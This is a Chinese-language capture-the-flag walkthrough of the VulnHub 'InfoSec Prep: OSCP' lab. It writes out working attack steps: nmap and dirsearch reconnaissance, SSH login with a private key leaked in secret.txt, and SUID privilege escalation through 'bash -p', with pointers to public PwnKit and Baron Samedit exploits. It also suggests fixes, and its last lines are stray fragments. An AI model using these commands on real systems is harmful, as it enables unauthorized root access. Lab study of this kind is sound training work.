InfoSec Prep: OSCP
InfoSec Prep: OSCP ~ VulnHubInfoSec Prep: OSCP, made by FalconSpy. Download & walkthrough links are available.
https://www.vulnhub.com/entry/infosec-prep-oscp,508/
1,將兩臺虛擬機網絡連接都改為NAT模式
2,攻擊機上做namp局域網掃描發現靶機
nmap -sn 192.168.23.0/24
那么攻擊機IP為192.168.23.182,靶場IP192.168.23.224
3,對靶機進行端口服務探測
nmap -sV -T4 -p- -A 192.168.23.224
nmap --scripts=vlun 192.168.23.224 -v
(1) CSRF漏洞(跨站請求偽造)
風險描述
掃描器在多個路徑發現無CSRF防護的表單(如搜索框、登錄表單),攻擊者可構造惡意鏈接誘騙用戶提交請求,可能導致:
- 用戶密碼被修改
- 惡意內容發布(如文章、評論)
- 管理員權限被竊取(通過后臺操作)
修復建議
- 為所有表單添加CSRF Token驗證(WordPress默認支持,需檢查主題/插件兼容性)。
- 使用nonce機制(WordPress函數wp_nonce_field)。
- 對關鍵操作(如密碼修改)要求二次驗證。
(2) 用戶枚舉風險
風險描述
發現用戶名admin,攻擊者可能針對此賬戶進行暴力破解。
修復建議
- 創建新管理員賬戶,刪除或重命名admin賬戶。
- 限制登錄嘗試次數(如使用插件Limit Login Attempts Reloaded)。
- 啟用雙因素認證(如Google Authenticator)。
(3) 版本信息泄露
風險點
- /readme.html泄露WordPress版本(5.4.2)。
- 遺留文件(如/wp-includes/images/rss.png)暴露舊版本痕跡。
修復建議
- 刪除/readme.html及無用遺留文件。
- 更新WordPress至最新版本(當前最新為6.5+),修復已知漏洞。
- 隱藏版本號(在functions.php中添加:remove_action('wp_head', 'wp_generator');)。
3. 其他Web風險
后臺暴露路徑
/wp-login.php和/wp-admin/upgrade.php可直接訪問。
建議:
- 限制后臺訪問IP(通過.htaccess或防火墻)。
- 修改后臺登錄路徑(使用插件WPS Hide Login)。
robots.txt泄露
- 需檢查robots.txt是否包含敏感路徑(如備份目錄、配置文件)。
4,訪問80端口開放的http服務
然后枚舉掃描其存在的子目錄
dirsearch -u http://192.168.23.224 -x 403,404
http://192.168.23.224/robots.txt
http://192.168.23.224/secret.txt
該頁面的亂碼有base64編碼的特征,解碼就能得到內容
是一個RSA私鑰,應該會在之后的橫向移動環節用到
5,初始網頁提示了只存在一個用戶oscp
創建并且使用密鑰登錄之
| -----BEGIN OPENSSH PRIVATE KEY----- |
vim is_rsa??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? chmod 600 is_rsa????????????????
ssh -i is_rsa oscp@192.168.23.224
登錄成功
6,信息收集一下
id
whoami
sudo -l
uname -a
查看所有具有suid權限的文件
find / -perm -u=s -type f 2>/dev/null
AI分析可能存在提權風險的SUID二進制文件及利用方法:
1.?/usr/bin/bash
- 風險:若bash具有SUID權限,可通過bash -p嘗試獲取root shell。
- 驗證方法:
/usr/bin/bash -p
若成功,將直接進入root權限的shell。 - 修復建議:移除bash的SUID位:
sudo chmod u-s /usr/bin/bash
2.?/usr/bin/pkexec
- 風險:受CVE-2021-4034(PwnKit漏洞)影響,低版本可本地提權。
- 驗證方法:
檢查版本:
pkexec --version
若版本低于0.105-26ubuntu1.1(Ubuntu)或未打補丁,可嘗試利用公開EXP。 - 利用步驟:
下載EXP并執行:
git clone https://github.com/berdav/CVE-2021-4034.git
cd CVE-2021-4034
make
./cve-2021-4034 - 修復建議:更新系統或運行apt upgrade policykit-1.
3.?/usr/bin/sudo
- 風險:CVE-2021-3156(Baron Samedit漏洞)允許本地用戶獲得root權限。
- 驗證方法:
檢查sudo版本:
sudo --version
若版本在1.8.2到1.8.31p2之間,可能存在風險。 - 利用步驟:
使用公開EXP(如https://github.com/blasty/CVE-2021-3156)。
4.?/usr/lib/snapd/snap-confine
- 風險:歷史漏洞如CVE-2021-44731(Ubuntu Snap提權)。
- 驗證方法:
檢查snapd版本:
snap --version
若版本低于2.54.3,可能存在漏洞。 - 修復建議:更新snapd:sudo apt update && sudo apt install snapd.
5.?/usr/bin/mount?或?/usr/bin/umount
- 風險:若允許用戶掛載敏感目錄(如/etc),可能覆蓋敏感文件。
- 利用條件:需允許非root用戶掛載特定設備。
- 示例:
mount -o loop /dev/sda1 /mnt?? # 嘗試掛載設備
若成功,可修改掛載目錄中的文件。
6.?/usr/bin/fusermount
- 風險:低版本存在CVE-2018-19824,允許非root用戶掛載FUSE文件系統。
- 驗證方法:
檢查版本:
fusermount --version
若版本低于2.9.9,可能存在風險。
7.?/usr/bin/chfn?或?/usr/bin/chsh
- 風險:若配置不當(如/etc/login.defs中CHFN_RESTRICT未設置),可能通過修改用戶信息提權。
- 利用方法:
chfn -o root /etc/passwd?? # 嘗試注入root權限
需要特定配置漏洞配合。
7,這里使用bash命令的suid提權方法
若二進制文件設置了?SUID?權限位(即?-rwsr-xr-x?),且未正確降權,攻擊者可能利用它訪問文件系統、提權或維持權限(例如作為 SUID 后門)。
在?Debian Stretch 及更早版本?中,默認允許 Shell(如?bash)以 SUID 權限運行(無需額外參數即可保留特權)。
利用步驟
- 創建本地 SUID 副本
將系統的?bash?二進制文件復制到當前目錄,并保留其 SUID 權限:
sudo install -m =xs $(which bash) .?
- install -m =xs:設置新文件的權限為?SUID(等效于?chmod u+s)。
- $(which bash):獲取系統默認?bash?的絕對路徑。
- 執行 SUID 二進制文件
運行復制的?bash?并附加?-p?參數以保留特權:
bash -p?
- -p?參數:啟動特權模式(不重置 UID/EUID)。
- 若成功,將進入?root shell(通過?id -u?驗證 UID 是否為?0)。
成功提權成為root用戶
)
)
:Unit 的概念)
